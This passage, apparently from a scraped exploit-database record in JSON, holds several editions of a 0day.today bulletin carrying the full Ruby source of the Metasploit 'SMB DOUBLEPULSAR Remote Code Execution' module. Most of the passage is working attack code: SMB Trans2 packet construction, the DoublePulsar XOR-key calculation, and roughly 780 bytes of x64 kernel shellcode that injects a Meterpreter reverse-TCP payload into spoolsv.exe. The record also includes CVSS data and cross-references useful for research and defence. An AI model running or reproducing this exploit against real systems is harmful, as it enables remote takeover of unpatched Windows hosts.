\\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-26] #"}, "lastseen": "2021-09-26T00:14:40", "differentElements": ["sourceData"], "edition": 25}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "50c74dc096fe1b4956380af53bf77ca6", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-26T22:17:27", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, 
{"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-26T00:14:40", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-26T00:14:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-27] #"}, "lastseen": "2021-09-26T22:17:27", "differentElements": ["sourceData"], "edition": 26}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "c57b6b4ec34a4f4c961021a893cbd3c3", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant by sending it the implant's kill opcode. Either target first runs the module's check (a DOUBLEPULSAR ping whose success response yields the implant's XOR key and architecture) and refuses to run while the DefangedMode advanced option, enabled by default, is set, because acting on the implant may contaminate forensic evidence; payload execution is only supported against the x64 implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": 